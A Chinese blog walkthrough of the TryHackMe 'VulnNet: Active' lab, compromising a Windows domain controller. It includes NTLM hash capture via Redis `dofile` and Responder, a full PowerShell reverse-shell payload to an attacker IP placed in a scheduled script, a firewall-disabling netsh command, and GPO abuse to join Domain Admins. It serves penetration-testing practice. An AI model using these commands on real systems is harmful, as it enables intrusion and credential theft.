TryHackMe-VulnNet: Active(ez 域渗透)
创始人
2024-06-01 00:49:08
0

VulnNet: Active

VulnNet Entertainment在他们以前的网络中遇到了不好的时光,该网络遭受了多次破坏。现在,他们移动了整个基础架构,并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。


这应该是我在thm打的最后一个中等难度的域渗透房间了,因为剩下的ad渗透都是定位:难 的房间

经验之谈:非官方的单域渗透靶机往往都有卡死、非常卡的问题,遇到不对劲直接重启靶机就完事了


端口扫描

循例 nmap

在这里插入图片描述

简单主动侦察

使用enum4linux:

enum4linux -a 10.10.134.253

这里能看到域名, 但不完整

在这里插入图片描述

再使用crackmapexec:

在这里插入图片描述

vulnnet.local

smb

smb这里也没东西

在这里插入图片描述

Redis枚举

在上面的端口扫描结果中有一个亮眼的端口就是6379,nmap显示这是redis

在这里插入图片描述

成功连上

但我目前对redis还较为薄弱,thm上有一个redis房间,过段时间再去看看

通过搜索引擎能够找到有关redis读取文件的文章:

在这里插入图片描述

NTLM 回传攻击

NTLM回传攻击在thm的域渗透教程中都是有教过的

通过这个命令能够进行文件读取,由于这里是在域内,思路就是利用这个点,然后访问攻击者开启的薄弱smb服务,然后redis这里就会去尝试进行ntlm身份验证,而攻击者也将获取该账户的ntlm hash

这个思路应该是没有问题的,来尝试一下

使用responder开启服务:

responder -I tun0

redis执行文件读取:

redis-cli -h 10.10.254.117 eval "dofile('//10.14.39.48//hack')" 0

在这里插入图片描述

使用haiti帮助我们快速找到hashcat的类型值

在这里插入图片描述

hashcat直接爆

在这里插入图片描述

SMB枚举

现在我们有了一组初始凭据,做的第一件事当然是回去smb看看有没有什么信息

在这里插入图片描述

在Enterprise-Share里发现一个powershell脚本

在这里插入图片描述

在这里插入图片描述

从这个文件名PurgeIrrelevantData和其内容,很容易能猜测到这可能是个定时脚本

我们可以尝试利用其来reverse shell,payload:

$client = New-Object System.Net.Sockets.TCPClient('10.14.39.48',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

在这里插入图片描述

在这里插入图片描述

nc监听

在这里插入图片描述

getshell

本地提权

看到该账户有个SeImpersonatePrivilege

在这里插入图片描述

直接上msf

在这里插入图片描述

一键开启rdp

在这里插入图片描述

dc这里是有防火墙拦截,所以先把防火墙关了

netsh advfirewall set allprofiles state off

在这里插入图片描述

将我们的账户加入本地管理员组,同时进入rdp

在这里插入图片描述

AD枚举

查看administrator账户,我们会发现它是LA和DA

在这里插入图片描述

虽然我们现在已经彻底拿下了这个DC,但我希望能借此为数不多的域渗透靶机来练习thm所教导的知识,在这里,我将练习sharphound

先开启smbserver

在这里插入图片描述

目标连接

在这里插入图片描述

SharpHound

跑sharphound

在这里插入图片描述

通过刚刚打开的smbserver将扫描结果传回

在这里插入图片描述

BloodHound

开启neo4j

neo4j console

启动bloodhound,并将zip丢进去

在这里插入图片描述

我们利用路径搜索,从我们当前的账户到Domain Admins组有这么一条路径

在这里插入图片描述

AD利用

我们发现我们当前账户有权对security-pol这个gpo进行修改

那么我们将利用它

在rdp中打开mmc

在这里插入图片描述

在用户配置->控制面板设置 新建即时任务

在这里插入图片描述

在这里插入图片描述

将我们的账户添加到DA组

在这里插入图片描述

弄好之后使用gpupdate /force强制立即更新组策略

在这里插入图片描述

此时,我们已经是DA

在这里插入图片描述

游戏结束

上一篇:HTML 文件路径

下一篇:Python OS 模块

相关内容

热门资讯

编程安卓系统和鸿蒙主题,跨平台... 你有没有想过,手机的世界里,除了苹果的iOS和安卓的操作系统,还有个神秘的鸿蒙系统?今天,咱们就来聊...
哪个安卓机系统好用,探索安卓系... 你有没有想过,手机里的安卓系统就像是个大厨,不同的系统就像不同的烹饪手法,有的让你吃得津津有味,有的...
安卓如何控制苹果系统,从安卓到... 你知道吗?在这个科技飞速发展的时代,安卓和苹果两大操作系统之间的较量从未停歇。虽然它们各自有着忠实的...
安卓原生系统文件夹,安卓原生系... 你有没有发现,每次打开安卓手机,里面那些文件夹就像是一个个神秘的宝箱,里面藏着各种各样的宝贝?今天,...
基于安卓系统的游戏开发,从入门... 你有没有想过,为什么安卓手机上的游戏总是那么吸引人?是不是因为它们就像是你身边的好朋友,随时随地都能...
安卓系统怎样装驱动精灵,安卓系... 你那安卓设备是不是突然间有点儿不给力了?别急,今天就来手把手教你如何给安卓系统装上驱动精灵,让你的设...
如何本地安装安卓系统包,详细步... 你有没有想过,把安卓系统装在你的电脑上,是不是就像给电脑穿上了时尚的新衣?想象你可以在电脑上直接玩手...
安卓12卡刷系统教程,体验全新... 你有没有发现,你的安卓手机最近有点儿不给力了?运行速度慢得像蜗牛,是不是也想给它来个“换血大法”,让...
安卓系统无法打开swf文件,安... 最近是不是发现你的安卓手机有点儿不给力?打开SWF文件时,是不是总是出现“无法打开”的尴尬局面?别急...
鸿蒙系统依赖于安卓系统吗,独立... 你有没有想过,我们手机里的那个鸿蒙系统,它是不是真的完全独立于安卓系统呢?这个问题,估计不少手机控都...
适合安卓系统的图片软件,精选图... 手机里堆满了各种美美的照片,是不是觉得找起来有点头疼呢?别急,今天就来给你安利几款超级适合安卓系统的...
阴阳师安卓系统典藏,探寻阴阳师... 亲爱的阴阳师们,你是否在安卓系统上玩得如痴如醉,对那些精美的典藏式神们垂涎欲滴?今天,就让我带你深入...
安卓系统有碎片化缺点,系统优化... 你知道吗?在手机江湖里,安卓系统可是个响当当的大侠。它那开放、自由的个性,让无数手机厂商和开发者都为...
安卓4系统手机微信,功能解析与... 你有没有发现,现在市面上还有很多安卓4系统的手机在使用呢?尤其是那些喜欢微信的朋友们,这款手机简直就...
鸿蒙系统是安卓的盗版,从安卓“... 你知道吗?最近在科技圈里,关于鸿蒙系统的讨论可是热闹非凡呢!有人说是安卓的盗版,有人则认为这是华为的...
安卓系统怎么剪辑音乐,轻松打造... 你是不是也和我一样,手机里存了超多好听的歌,但是有时候想给它们来个变身,变成一段专属的旋律呢?别急,...
怎么把安卓手机系统变为pc系统... 你有没有想过,把你的安卓手机变成一台PC呢?听起来是不是有点酷炫?想象你可以在手机上玩电脑游戏,或者...
手机怎么装安卓11系统,手机安... 你有没有想过,让你的手机也来个“青春焕发”,升级一下系统呢?没错,就是安卓11系统!这个新系统不仅带...
安卓系统如何拼网络,构建高效连... 你有没有想过,你的安卓手机是怎么和网络“谈恋爱”的呢?没错,就是拼网络!今天,就让我带你一探究竟,看...
安卓系统怎么看小说,轻松畅享电... 你有没有发现,手机里装了那么多应用,最离不开的竟然是那个小小的小说阅读器?没错,就是安卓系统上的小说...